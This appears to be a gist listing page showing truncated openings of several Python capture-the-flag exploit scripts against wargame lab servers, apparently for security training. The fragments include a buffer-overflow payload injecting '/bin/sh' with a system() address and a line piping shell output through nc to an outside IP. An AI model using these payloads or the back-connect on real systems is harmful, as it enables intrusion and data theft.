This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import socket | |
import time | |
import re | |
from Pwning import * | |
pl = Payload() | |
def get_socket(host, port): | |
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
s.connect((host, port)) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
from Pwning import * | |
# customs when binary doesn't have nx eable or mprotect/nmap is on got table | |
# from Shellcode import * | |
# edit Templet with your own Name | |
class CGC(Payload): | |
def __init__(self): | |
Payload.__init__(self) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
from Pwn import * | |
# from Shellcode import * | |
p = Pwn(mode=1,host='lab33.wargame.whitehat.vn',port=10300) | |
def exploit(): | |
payload = '<su>' + 'A'*127 + '<to>' + '/bin/sh;' + 'C'*120 | |
payload+= p.pack(0x400A40)[:3] # system |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
from Pwn import * | |
p = Pwn(host='54.165.223.128',port=2555) | |
# p = Pwn() | |
def create_contact(name,description): | |
p.read_until('>>>') | |
p.write('1\n') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
from Pwn import * | |
# p = Pwn(mode=1,port=12012) | |
p = Pwn(mode=1,host='54.175.183.202',port=12012) | |
username = 'blankwall' | |
password = ';rpywx~YYYBBBBB~:::::::=KP`' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
import socket | |
import re | |
from capstone import * | |
from Pwn import * | |
import sys | |
# p = Pwn(mode=1,host='52.20.10.244',port=12351) | |
def disas(code): | |
asm = '' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
from Pwn import * | |
import re | |
def add_skeleton(skeleton): | |
d = p.read_until('\x1b[0;31;49m[q]\x1b[0muit') | |
p.write('m\n') | |
p.read_until('so... what do you say to mr skeletal?\n') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
from Pwn import * | |
p = Pwn(host='54.152.37.20',port=24242) | |
# p = Pwn(port=24242) | |
def exploit(): | |
shell = raw_input('> ') | |
back_connect = shell + ' | nc 128.199.171.28 8001' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
from Pwn import * | |
p = Pwn(mode=1,host='lab02.matesctf.org',port=4001) | |
def add_node(nid,content): | |
p.read_until('Please choose an option :') | |
p.write('1\n') | |
p.read_until('Please give me an id:') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
from Pwn import * | |
import string | |
p = Pwn(mode=1,host='lab04.matesctf.org',port=4003) | |
def find_index_flag(): | |
p.read_until('Remember: send us your hex-encoded flag.\r\n') | |
last = 0xff # -2 |
OlderNewer